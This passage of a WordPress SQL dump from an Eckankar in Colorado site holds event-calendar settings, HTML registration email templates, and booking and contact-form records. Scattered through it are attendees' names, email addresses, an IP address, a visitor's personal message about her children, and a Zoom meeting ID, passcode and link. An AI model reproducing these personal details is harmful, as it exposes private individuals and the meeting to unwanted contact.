Here\";s:19:\"private_description\";s:0:\"\";s:5:\"price\";s:1:\"0\";s:11:\"price_label\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:9:\"unlimited\";s:1:\"1\";s:14:\"minimum_ticket\";s:1:\"1\";s:18:\"stop_selling_value\";s:1:\"0\";s:17:\"stop_selling_type\";s:4:\"hour\";s:5:\"dates\";a:0:{}}}'),(182259,268430,'mec_fees_global_inheritance','1'),(182260,268430,'mec_fees','a:0:{}'),(182261,268430,'mec_ticket_variations_global_inheritance','1'),(182262,268430,'mec_ticket_variations','a:0:{}'),(182263,268430,'mec_reg_fields_global_inheritance','1'),(182264,268430,'mec_reg_fields','a:0:{}'),(182265,268430,'mec_bfixed_fields','a:0:{}'),(182266,268430,'mec_op','a:0:{}'),(182267,268430,'mec_fields','a:0:{}'),(182268,268430,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:27:\"Eckankar Event Registration\";s:7:\"content\";s:6143:\"<div>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</div>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><img class=\"alignnone size-full wp-image-266555\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/04/email-img-registration-600-5.jpg\" alt=\"\" width=\"602\" height=\"302\" /></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #f28a27; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>Event Registration Confirmation</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\">\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px;\"><b>Hello %%first_name%% and thank you for registering!</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 20px;\">You are signed up for the following online event:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b><span style=\"color: #f28a27;\">Title: </span>%%event_title%%</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Date: </b>%%event_start_date%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Time: </b>%%event_start_time%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 15px;\"> </p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px; color: #f28a27;\"><b>Zoom Login Information:</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b>Meeting ID: </b>891 2510 3432<br />\r\n<b>Passcode:</b> 162109</p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><a href=\"https://us02web.zoom.us/j/89125103432?pwd=QVRETUo3bENGM0lKZzhDN2pjVGZnQT09\">https://us02web.zoom.us/j/89125103432?pwd=QVRETUo3bENGM0lKZzhDN2pjVGZnQT09</a></p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><b>Dial-in number: </b>720-707-2699 (for those who need to join by phone)</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">See you there!</p>\r\n</div>\r\n<p><!-- [if mso]>\r\n                </td>\r\n</tr>\r\n</table>\r\n<p>                <![endif]--></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado</a> website. If you have any questions regarding the origin of this email, please feel free to get in touch, we\'re always happy to help out.</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span><br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:22:\"New Event Registration\";s:7:\"content\";s:9904:\"<!-- [if !mso]><!--><!--<![endif]--><!-- [if (gte mso 9)|(IE)]>\r\n\r\n      <xml>\r\n        <o:OfficeDocumentSettings>\r\n          <o:AllowPNG/>\r\n          <o:PixelsPerInch>96</o:PixelsPerInch>\r\n        </o:OfficeDocumentSettings>\r\n      </xml>\r\n      <![endif]--><!-- [if (gte mso 9)|(IE)]>\r\n  \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<style type=\"text/css\">\r\n    body {width: 600px;margin: 0 auto;}\r\n    table {border-collapse: collapse;}\r\n    table, td {mso-table-lspace: 0pt;mso-table-rspace: 0pt;}\r\n    img {-ms-interpolation-mode: bicubic;}\r\n  </style>\r\n<![endif]-->\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p>\r\n<style type=\"text/css\">\r\n    body, p, div {\r\n      font-family: inherit;\r\n      font-size: 14px;\r\n    }\r\n    body {\r\n      color: #000000;\r\n    }\r\n    body a {\r\n      color: #1188E6;\r\n      text-decoration: none;\r\n    }\r\n    p { margin: 0; padding: 0; }\r\n    table.wrapper {\r\n      width:100% !important;\r\n      table-layout: fixed;\r\n      -webkit-font-smoothing: antialiased;\r\n      -webkit-text-size-adjust: 100%;\r\n      -moz-text-size-adjust: 100%;\r\n      -ms-text-size-adjust: 100%;\r\n    }\r\n    img.max-width {\r\n      max-width: 100% !important;\r\n    }\r\n    .column.of-2 {\r\n      width: 50%;\r\n    }\r\n    .column.of-3 {\r\n      width: 33.333%;\r\n    }\r\n    .column.of-4 {\r\n      width: 25%;\r\n    }\r\n    ul ul ul ul  {\r\n      list-style-type: disc !important;\r\n    }\r\n    ol ol {\r\n      list-style-type: lower-roman !important;\r\n    }\r\n    ol ol ol {\r\n      list-style-type: lower-latin !important;\r\n    }\r\n    ol ol ol ol {\r\n      list-style-type: decimal !important;\r\n    }\r\n    @media screen and (max-width:480px) {\r\n      .preheader .rightColumnContent,\r\n      .footer .rightColumnContent {\r\n        text-align: left !important;\r\n      }\r\n      .preheader .rightColumnContent div,\r\n      .preheader .rightColumnContent span,\r\n      .footer .rightColumnContent div,\r\n      .footer .rightColumnContent span {\r\n        text-align: left !important;\r\n      }\r\n      .preheader .rightColumnContent,\r\n      .preheader .leftColumnContent {\r\n        font-size: 80% !important;\r\n        padding: 5px 0;\r\n      }\r\n      table.wrapper-mobile {\r\n        width: 100% !important;\r\n        table-layout: fixed;\r\n      }\r\n      img.max-width {\r\n        height: auto !important;\r\n        max-width: 100% !important;\r\n      }\r\n      a.bulletproof-button {\r\n        display: block !important;\r\n        width: auto !important;\r\n        font-size: 80%;\r\n        padding-left: 0 !important;\r\n        padding-right: 0 !important;\r\n      }\r\n      .columns {\r\n        width: 100% !important;\r\n      }\r\n      .column {\r\n        display: block !important;\r\n        width: 100% !important;\r\n        padding-left: 0 !important;\r\n        padding-right: 0 !important;\r\n        margin-left: 0 !important;\r\n        margin-right: 0 !important;\r\n      }\r\n      .social-icon-column {\r\n        display: inline-block !important;\r\n      }\r\n    }\r\n  </style>\r\n</p>\r\n<p>\r\n<style>\r\nbody {font-family: \'Muli\', sans-serif;}\r\n</style>\r\n</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<!--user entered Head Start--><!--End Head user entered--><center class=\"wrapper\" data-link-color=\"#1188E6\" data-body-style=\"font-size:14px; font-family:inherit; color:#000000; background-color:#FFFFFF;\">\r\n<div class=\"webkit\">\r\n<table class=\"wrapper\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" bgcolor=\"#FFFFFF\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"top\" bgcolor=\"#FFFFFF\" width=\"100%\">\r\n<table class=\"outer\" role=\"content-container\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td width=\"100%\">\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><!-- [if mso]>\r\n    <center>\r\n    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<table>\r\n<tr>\r\n<td width=\"600\">\r\n  <![endif]-->\r\n<table style=\"width: 100%; max-width: 600px;\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0px 0px 0px 0px; color: #000000; text-align: left;\" role=\"modules-container\" align=\"left\" bgcolor=\"#FFFFFF\" width=\"100%\">\r\n<table class=\"module preheader preheader-hide\" style=\"display: none !important; mso-hide: all; visibility: hidden; opacity: 0; color: transparent; height: 0; width: 0;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"preheader\">\r\n<tbody>\r\n<tr>\r\n<td role=\"module-content\">\r\n<p>&nbsp;</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table style=\"padding: 30px 20px 30px 20px;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" bgcolor=\"#f6f6f6\" data-type=\"columns\" data-distribution=\"1\">\r\n<tbody>\r\n<tr role=\"module-content\">\r\n<td valign=\"top\" height=\"100%\">\r\n<table class=\"column column-0\" style=\"width: 540px; border-spacing: 0; border-collapse: collapse; margin: 0px 10px 0px 10px;\" border=\"0\" width=\"540\" cellspacing=\"0\" cellpadding=\"0\" align=\"left\" bgcolor=\"\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0px; margin: 0px; border-spacing: 0;\">\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"6c9e9414-eb30-47e2-97d8-7bd6a4df5990\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 0px 10px 0px; line-height: 24px; text-align: inherit;\" role=\"module-content\" valign=\"top\" bgcolor=\"\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #1d5791; font-family: arial, helvetica, sans-serif; font-size: 36px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto;\">Admin Notification</span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"948e3f3f-5214-4721-a90e-625a47b1c957\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 30px 18px 30px; line-height: 26px; text-align: inherit; background-color: #efefef;\" role=\"module-content\" valign=\"top\" bgcolor=\"#efefef\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #707172; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>New Event Registration</strong></span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a10dcb57-ad22-4f4d-b765-1d427dfddb4e\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 30px 18px 30px; line-height: 22px; text-align: inherit; background-color: #ffffff;\" role=\"module-content\" valign=\"top\" bgcolor=\"#ffffff\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 20px; color: #333333;\"><strong>A new registration has been submitted for the following event:</strong></span></div>\r\n<p>&nbsp;</p>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>%%event_title%%</strong></span></div>\r\n<div></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Date: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_date%%</strong></span></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Time: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_time%%</strong></span> </div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a4e5faa9-7044-47fd-a4a1-b7a1746c258e\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 0px 18px 5px; line-height: 22px; text-align: inherit; background-color: #efefef;\" role=\"module-content\" valign=\"top\" bgcolor=\"#efefef\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"font-size: 14pt;\">%%attendees_full_info%%</span> </div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a265ebb9-ab9c-43e8-9009-54d6151b1600\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 8px 30px 40px 28px; line-height: 22px; text-align: inherit; background-color: #6e6e6e;\" role=\"module-content\" valign=\"top\" bgcolor=\"#6e6e6e\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"></div>\r\n<figure style=\"text-align: center;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px;\">© Eckankar In Colorado -2022</span></figure>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<!-- [if mso]>\r\n                                  </td>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                                </tr>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                              </table>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                            </center>\r\n                            <![endif]--></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</center>\";}}'),(182269,268430,'mec_event_status','EventScheduled'),(182270,268430,'mec_moved_online_link',''),(182271,268430,'mec_cancelled_reason',''),(182272,268430,'mec_display_cancellation_reason_in_single_page',''),(182273,268430,'protect_children',''),(182274,268430,'passster_activate_global_protection',NULL),(182275,268430,'passster_activate_protection',NULL),(182276,268430,'passster_protection_type','password'),(182277,268430,'boldgrid_hide_page_title','0'),(182278,268430,'_thumbnail_id','268416'),(182279,268430,'_oembed_ace4d65561aa575fe8833c60d61f4161','{{unknown}}'),(182280,268430,'boldgrid_in_page_containers','1'),(182283,268430,'_dp_original','266545'),(182282,268430,'passster_area_shortcode',''),(182284,268430,'_edit_lock','1682351449:2'),(182285,268430,'_edit_last','2'),(185909,268687,'_field_138','Hello! \n\nI am newer to the area and looking to connect with others in my growth for spirituality. I have never heard of Eck before, but it seems to be something that I can resonate with.\n\nI would love to attend the service tomorrow, but my first question is whether children are welcome to join as I didn\'t see any in the photos (for reference, I am a mother to a 4 year old and a 9 month old). \n\nAnd is this event something that happens every Sunday? If not, how do you connect otherwise? \n\nThank you!\n'),(185907,268687,'_field_135','Maryssa.brown@gmail.com'),(185906,268687,'_field_134','Brown'),(182289,268431,'mec_transaction_id','SNV66954'),(182290,268431,'mec_user_id','1000082'),(182291,268431,'mec_verified','1'),(182292,268431,'mec_verification_key','af4b9d8a8c05f1d18ac09314289a7e88'),(182293,268431,'mec_cancellation_key','413f7fb6cccf4ce3760bd5edd3b0e216'),(182294,268431,'mec_confirmed','1'),(182295,268431,'mec_event_id','268430'),(182296,268431,'mec_date','1683455400:1683502200'),(182297,268431,'mec_ticket_id',',1,'),(182298,268431,'mec_booking_time','2023-04-24 14:34:45'),(182299,268431,'mec_all_dates','a:0:{}'),(182300,268431,'mec_other_dates','a:0:{}'),(182301,268431,'mec_attention_time','1683455400:1683502200'),(182302,268431,'mec_attention_time_start','1683455400'),(182303,268431,'mec_attention_time_end','1683502200'),(182304,268431,'mec_book_date_submit','20230424143445'),(182305,268431,'mec_booking_location','118'),(182306,268431,'mec_ticket_price_1','0'),(182307,268431,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:22:\"Paigeblake89@yahoo.com\";s:4:\"name\";s:11:\"Paige Blake\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:14:\"65.130.183.206\";}}'),(182308,268431,'mec_price','0'),(182309,268431,'mec_gateway','MEC_gateway_free'),(182310,268431,'mec_gateway_label','Free'),(182311,268162,'_edit_lock','1682441446:2'),(182312,268162,'passster_area_shortcode',''),(182313,268434,'_field_224','Cody '),(182314,268434,'_field_225','East '),(182315,268434,'_field_226','Coworker60@q.com'),(182316,268434,'_field_227','CO'),(182317,268434,'_field_228','US'),(182318,268434,'_field_229','a:1:{i:0;s:8:\"Loveland\";}'),(182319,268434,'_form_id','21'),(182320,268434,'_seq_num','170'),(182321,268435,'_field_179','Cody '),(182322,268435,'_field_180','East '),(182323,268435,'_field_181','Coworker60@q.com'),(182324,268435,'_field_182','CO'),(182325,268435,'_field_183','US'),(182326,268435,'_field_184','a:1:{i:0;s:8:\"Loveland\";}'),(182327,268435,'_form_id','17'),(182328,268435,'_seq_num','17'),(182329,266827,'passster_area_shortcode',''),(182337,268436,'_seq_num','50'),(182338,268437,'_field_179','Bonnie'),(182339,268437,'_field_180','Alexander-Reeves'),(182340,268437,'_field_181','bonnie.alexander.reeves@outlook.com'),(182341,268437,'_field_182','CO'),(182342,268437,'_field_183','US'),(182343,268437,'_field_184','a:1:{i:0;s:41:\"Central Colorado - ECK Temple in Colorado\";}'),(182344,268437,'_form_id','17'),(182345,268437,'_seq_num','18'),(184268,268593,'boldgrid_hide_page_title','0'),(184266,268593,'mec_cancelled_reason',''),(184265,268593,'mec_moved_online_link',''),(184264,268593,'mec_event_status','EventScheduled'),(184263,268593,'mec_fields','a:0:{}'),(184262,268593,'mec_op','a:0:{}'),(184255,268593,'mec_fees_global_inheritance','1'),(184256,268593,'mec_fees','a:0:{}'),(184257,268593,'mec_ticket_variations_global_inheritance','1'),(184258,268593,'mec_ticket_variations','a:0:{}'),(184259,268593,'mec_reg_fields_global_inheritance','1'),(184260,268593,'mec_reg_fields','a:0:{}'),(184261,268593,'mec_bfixed_fields','a:0:{}'),(184254,268593,'mec_tickets','a:0:{}'),(184253,268593,'mec_booking','a:27:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:24:\"bookings_payable_inherit\";s:1:\"1\";s:16:\"bookings_payable\";s:3:\"100\";s:21:\"bookings_payable_type\";s:7:\"percent\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(184252,268593,'mec_hourly_schedules','a:0:{}'),(184251,268593,'mec_not_in_days',''),(184250,268593,'mec_in_days',''),(184249,268593,'mec_advanced_days','a:0:{}'),(184248,268593,'mec_repeat_end_at_date',''),(184233,268593,'mec_start_date','2023-06-15'),(184234,268593,'mec_start_time_hour','7'),(184235,268593,'mec_start_time_minutes','0'),(184236,268593,'mec_start_time_ampm','PM'),(184237,268593,'mec_start_day_seconds','68400'),(184238,268593,'mec_end_date','2023-06-15'),(184239,268593,'mec_end_time_hour','8'),(184240,268593,'mec_end_time_minutes','0'),(184241,268593,'mec_end_time_ampm','PM'),(184242,268593,'mec_end_day_seconds','72000'),(184243,268593,'mec_repeat_status','0'),(184244,268593,'mec_repeat_type',''),(184245,268593,'mec_repeat_interval','1'),(184246,268593,'mec_repeat_end',''),(184247,268593,'mec_repeat_end_at_occurrences',''),(184232,268593,'mec_public','1'),(184231,268593,'mec_countdown_method','global'),(184230,268593,'mec_timezone','global'),(184229,268593,'mec_comment',''),(184228,268593,'mec_hide_end_time','0'),(184227,268593,'mec_hide_time','0'),(184226,268593,'one_occurrence','0'),(184225,268593,'mec_allday','0'),(184224,268593,'mec_certain_weekdays','a:0:{}'),(184219,268593,'mec_currency','a:0:{}'),(184220,268593,'mec_additional_organizer_ids','a:0:{}'),(184221,268593,'mec_additional_location_ids','a:0:{}'),(184222,268593,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-06-15\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-06-15\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(184223,268593,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(184218,268593,'mec_cost',''),(184217,268593,'mec_more_info_target','_self'),(184216,268593,'mec_more_info_title',''),(184215,268593,'mec_more_info',''),(184214,268593,'mec_read_more',''),(184213,268593,'mec_organizer_id','1'),(184210,268593,'mec_color',''),(184211,268593,'mec_location_id','171'),(184212,268593,'mec_dont_show_map','0'),(184209,268593,'protect_children',''),(182418,268440,'mec_color',''),(182419,268440,'mec_location_id','118'),(182420,268440,'mec_dont_show_map','0'),(182421,268440,'mec_organizer_id','1'),(182422,268440,'mec_read_more',''),(182423,268440,'mec_more_info',''),(182424,268440,'mec_more_info_title',''),(182425,268440,'mec_more_info_target','_self'),(182426,268440,'mec_cost',''),(182427,268440,'mec_currency','a:0:{}'),(182428,268440,'mec_additional_organizer_ids','a:0:{}'),(182429,268440,'mec_additional_location_ids','a:0:{}'),(182430,268440,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-05-28\";s:4:\"hour\";s:2:\"12\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-05-28\";s:4:\"hour\";s:1:\"1\";s:7:\"minutes\";s:2:\"20\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Sun.4\";s:11:\"end_at_date\";s:0:\"\";s:3:\"end\";s:11:\"occurrences\";s:18:\"end_at_occurrences\";s:2:\"12\";}}'),(182431,268440,'mec_repeat','a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Sun.4\";s:11:\"end_at_d